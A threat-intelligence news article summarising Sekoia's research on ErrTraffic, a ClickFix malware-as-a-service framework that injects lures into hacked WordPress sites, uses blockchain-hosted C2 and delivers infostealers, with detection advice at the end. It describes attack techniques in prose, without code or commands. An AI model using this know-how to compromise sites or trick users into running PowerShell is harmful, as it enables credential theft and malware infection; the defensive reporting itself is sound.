Do Son 
At a glance
| Malware family | ErrTraffic (ClickFix distribution framework / TDS, sold as MaaS) |
| Threat actor | Sold by “LenAI”; rental “Beer” cluster and source-code “Analytics” cluster (Sekoia high-confidence assessments) |
| Target / victims | Visitors to compromised WordPress sites; developers and AI users via fake AI platform sites |
| Delivery vector | ClickFix lures (fake CAPTCHA, blue screen, font glitches) on hacked WordPress; suspected malvertising |
| Key capabilities | EtherHiding blockchain C2, geo/OS-filtering TDS, PowerShell payload delivery, PHP backdoors |
| Source | Sekoia TDR, building on HudsonRock, LevelBlue, and Monarx |
TL;DR
Sekoia has detailed ErrTraffic malware, a fast-growing ClickFix distribution framework sold as a service. The toolkit injects malicious JavaScript into hacked WordPress sites and tricks visitors into running PowerShell. To stay hidden, it pulls its C2 address from the Polygon blockchain using a technique called EtherHiding.
Delivery: ClickFix lures on hacked sites
The campaign starts on compromised WordPress sites. Attackers inject a small block of JavaScript into otherwise legitimate pages. That script then renders a ClickFix lure over the content. Victims see a fake Cloudflare or reCAPTCHA check, a Windows blue screen, or broken-font “glitch” errors. Each lure pushes the same request: press a keyboard shortcut to “fix” the issue. That shortcut pastes a hidden PowerShell command from the clipboard, and running it downloads the real payload.
Attackers also spread the lure through fake AI download sites. Pages posing as Google Antigravity and ChatGPT serve the same trick, likely via malvertising. Sekoia calls these fake pages “empty shells whose sole purpose is to deliver” payloads. They target developers and AI users, a group that often holds elevated access.
How the infection chain works
Initial access rarely involves an exploit. Instead, attackers log in with stolen administrator credentials. Sekoia traced one breach to credential stuffing routed through residential proxies. Once inside, the operator plants a PHP backdoor as a WordPress MU-plugin. MU-plugins load automatically and resist removal from the admin panel. The backdoor injects ErrTraffic, serves the ClickFix lure, and opens a webshell. In one case, the operators also tried CVE-2020-25213, a known WP File Manager flaw, as an automated fallback. It failed because the plugin was absent. The implant adds further capabilities, including credential harvesting, WooCommerce order skimming, and evasion that pauses activity when scanners like Wordfence appear.
Blockchain C2 and payload delivery
ErrTraffic hides its infrastructure on-chain. The injected script queries a Polygon smart contract to resolve the current C2 domain. This EtherHiding approach lets operators rotate servers without touching the injected code. As Sekoia notes, it works “across thousands of compromised sites” and resists takedowns. Communications in the main rental cluster use RC4 encryption. The PowerShell command then fetches a final payload tailored by geolocation and operating system. Observed payloads include Vidar, Stealc, Remus, and Salat infostealers, plus loaders like SmokeLoader, DanaBot, and HijackLoader.
A growing Malware-as-a-Service
ErrTraffic runs on a rental model. Sekoia tracked the operator, LenAI, advertising it since December 2025. Monthly access rose from $300 to $380. The source code climbed from $1,500 in January to $4,500 with lifetime support. A queue-based system limits rental spots to keep the tool quiet. This pricing and exclusivity point to a healthy criminal business.
Detection and defense guidance
This ErrTraffic malware blends into trusted-looking pages, so defenders need layered detection. Enable PowerShell ScriptBlock logging to catch the decoded commands. Watch for blockchain RPC calls followed quickly by PowerShell execution. Audit the WordPress mu-plugins directory and use server-side file-integrity monitoring. Rotate WordPress credentials and enforce strong multi-factor authentication.
Attribution stays mixed. The seller handle “LenAI” is confirmed on cybercrime forums. Sekoia assesses with high confidence that LenAI runs the rental “Beer” cluster. A separate actor likely bought older source code to run the “Analytics” cluster, though their identity remains unknown. Affiliates praise the toolkit; one even claimed a “10% rate, which is impressive.” For the full technical breakdown, read Sekoia’s analysis of the ErrTraffic ClickFix framework. Expect this ClickFix attack ecosystem to keep growing.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
